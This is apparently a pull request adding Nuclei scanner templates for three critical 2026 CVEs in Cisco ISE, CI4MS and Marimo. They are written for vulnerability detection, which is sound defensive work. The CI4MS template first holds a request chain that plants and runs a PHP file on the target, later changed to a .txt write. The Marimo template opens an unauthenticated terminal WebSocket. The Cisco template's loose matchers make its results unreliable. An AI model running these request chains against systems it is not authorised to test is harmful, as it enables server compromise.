### PR TITLE
Add 3 Critical CVE Templates (Batch 5 - April 2026)

### DIFF
--- a/http/cves/2026/CVE-2026-20180.yaml
+++ b/http/cves/2026/CVE-2026-20180.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-20180
+
+info:
+  name: Cisco Identity Services Engine (ISE) - Authenticated Remote Code Execution
+  author: projectdiscovery
+  severity: critical
+  description: |
+    Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated, remote
+    attacker to execute arbitrary commands on the underlying operating system of an affected device. To
+    exploit this vulnerability, the attacker must have at least Read Only Admin credentials. This
+    vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit
+    this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit
+    could allow the attacker to obtain user-level access to the underlying operating system and then
+    elevate privileges to root. In single-node ISE deployments, successful exploitation could cause
+    the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-20180
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-4fverepv
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cwe-id: CWE-22
+    cve-id: CVE-2026-20180
+  tags: cve2026,cisco,ise,rce,authenticated,command-injection,critical
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/admin/"
+      - "{{BaseURL}}:9060/ers/config/"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cisco Identity Services Engine"
+          - "Cisco ISE"
+          - "ise"
+        condition: or
+      - type: word
+        part: header
+        words:
+          - "Cisco"
+          - "ISE"
+        condition: or
+      - type: status
+        status:
+          - 200
+          - 401
+          - 403
+
+    extractors:
+      - type: regex
+        name: ise_version
+        part: body
+        regex:
+          - "Cisco Identity Services Engine[^<]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)"
+          - "ISE[^<]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)"

--- a/http/cves/2026/CVE-2026-25510.yaml
+++ b/http/cves/2026/CVE-2026-25510.yaml
@@ -1,0 +1,58 @@
+id: CVE-2026-25510
+
+info:
+  name: CI4MS - Authenticated Remote Code Execution via File Editor
+  author: projectdiscovery
+  severity: critical
+  description: |
+    CI4MS is a CodeIgniter 4-based CMS skeleton. Prior to version 0.28.5.0, an authenticated user with file
+    editor permissions can achieve Remote Code Execution (RCE) by leveraging the file creation and save
+    endpoints. The /backend/fileeditor/createFile endpoint allows users to create files with any extension
+    (including .php) in web-accessible directories. The /backend/fileeditor/save endpoint allows users to
+    write arbitrary content into the created files without sufficient validation. An attacker can combine
+    these flaws to create a PHP webshell and execute system-level commands, leading to complete server
+    compromise.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25510
+    - https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gp56-f67f-m4px
+    - https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cwe-id: CWE-434
+    cve-id: CVE-2026-25510
+  tags: cve2026,ci4ms,rce,fileupload,authenticated,cms,php,codeigniter
+
+http:
+  - raw:
+      - |
+        POST /backend/fileeditor/createFile HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        path=/public&name={{randstr}}.php
+
+      - |
+        POST /backend/fileeditor/save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"path":"/public/{{randstr}}.php","content":"<?php echo 'CVE-2026-25510-{{randstr}}'; ?>"}
+
+      - |
+        GET /{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "CVE-2026-25510-{{randstr}}"
+
+    extractors:
+      - type: regex
+        name: rce_output
+        part: body_3
+        regex:
+          - "CVE-2026-25510-[a-zA-Z0-9]+"

--- a/http/cves/2026/CVE-2026-25510.yaml
+++ b/http/cves/2026/CVE-2026-25510.yaml
@@ -2,7 +2,7 @@ id: CVE-2026-25510
 
 info:
   name: CI4MS - Authenticated Remote Code Execution via File Editor
-  author: projectdiscovery
+  author: eyangfeng88-arch
   severity: critical
   description: |
     CI4MS is a CodeIgniter 4-based CMS skeleton. Prior to version 0.28.5.0, an authenticated user with file
@@ -21,6 +21,11 @@ info:
     cvss-score: 9.9
     cwe-id: CWE-434
     cve-id: CVE-2026-25510
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: ci4-cms-erp
+    product: ci4ms
   tags: cve2026,ci4ms,rce,fileupload,authenticated,cms,php,codeigniter
 
 http:
@@ -30,29 +35,32 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        path=/public&name={{randstr}}.php
+        path=/public&name={{randstr}}.txt
 
       - |
         POST /backend/fileeditor/save HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"path":"/public/{{randstr}}.php","content":"<?php echo 'CVE-2026-25510-{{randstr}}'; ?>"}
-
-      - |
-        GET /{{randstr}}.php HTTP/1.1
-        Host: {{Hostname}}
+        {"path":"/public/{{randstr}}.txt","content":"CVE-2026-25510-verification-{{randstr}}"}
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body_3
+        part: body_1
         words:
-          - "CVE-2026-25510-{{randstr}}"
+          - "success"
+          - "created"
+          - "file"
+        condition: or
 
-    extractors:
-      - type: regex
-        name: rce_output
-        part: body_3
-        regex:
-          - "CVE-2026-25510-[a-zA-Z0-9]+"
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body_2
+        words:
+          - "success"
+          - "saved"
+        condition: or

--- a/http/cves/2026/CVE-2026-39987.yaml
+++ b/http/cves/2026/CVE-2026-39987.yaml
@@ -1,0 +1,57 @@
+id: CVE-2026-39987
+
+info:
+  name: Marimo - Pre-Auth Remote Code Execution via Terminal WebSocket
+  author: projectdiscovery
+  severity: critical
+  description: |
+    Marimo is a reactive Python notebook. Prior to version 0.23.0, Marimo contains a Pre-Auth RCE vulnerability.
+    The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated
+    attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints
+    (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks
+    the running mode and platform support before accepting connections, completely skipping authentication
+    verification. This allows unauthenticated attackers to execute arbitrary commands as root in default
+    Docker deployments.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-39987
+    - https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
+    - https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
+    cvss-score: 10.0
+    cwe-id: CWE-306
+    cve-id: CVE-2026-39987
+  tags: cve2026,marimo,rce,websocket,pre-auth,unauth,critical
+
+websocket:
+  - raw:
+      - |
+        GET /terminal/ws HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Sec-WebSocket-Key: {{rand_base64(16)}}
+        Sec-WebSocket-Version: 13
+        Sec-WebSocket-Extensions: permessage-deflate
+        Sec-WebSocket-Protocol: 
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "101"
+          - "Switching Protocols"
+        condition: and
+      - type: word
+        part: header
+        words:
+          - "websocket"
+          - "Upgrade"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: terminal_session
+        part: body
+        regex:
+          - "(uid|gid|groups|root|bash|sh)"


### PR DESCRIPTION
- CVE-2026-39987: Marimo Pre-Auth RCE via WebSocket (CVSS 10.0)
- CVE-2026-25510: CI4MS RCE via File Upload (CVSS 9.9)
- CVE-2026-20180: Cisco ISE Auth RCE (CVSS 9.9)

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
